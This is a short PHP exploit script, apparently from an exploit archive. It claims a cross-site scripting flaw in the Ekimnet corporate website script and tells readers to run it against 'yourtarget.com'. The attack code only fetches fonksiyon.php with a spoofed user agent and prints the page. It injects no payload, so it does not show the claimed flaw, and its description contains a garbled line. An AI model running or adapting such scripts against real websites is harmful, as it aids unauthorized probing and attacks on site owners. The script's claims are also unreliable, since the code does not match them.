#!/usr/bin/php -f
<?php
##################################################################
# Exploit TÄ°tle : Ekimnet Kurumsal Firma Scripti XSS
# Venedor Homepage : https://ekimnet.com/
# Software Link : https://ekimnet.com/2018-07-21_01-13-17/
#
# Author : z3r0fy
# www.bighatz.org - www.bugcontainer.gq
#
# Using PoC : php -f poc.php http://yourtarget.com
##################################################################
/*
DESCRIPTION
Userinput reaches sensitive sink.
Check index.php
18: echo echo $url; // fonksiyon.php
6: $url = "http://" . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']); // fonksiyon.php
*/
//
// HTTP SERVER,
//
$target = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/fonksiyon.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
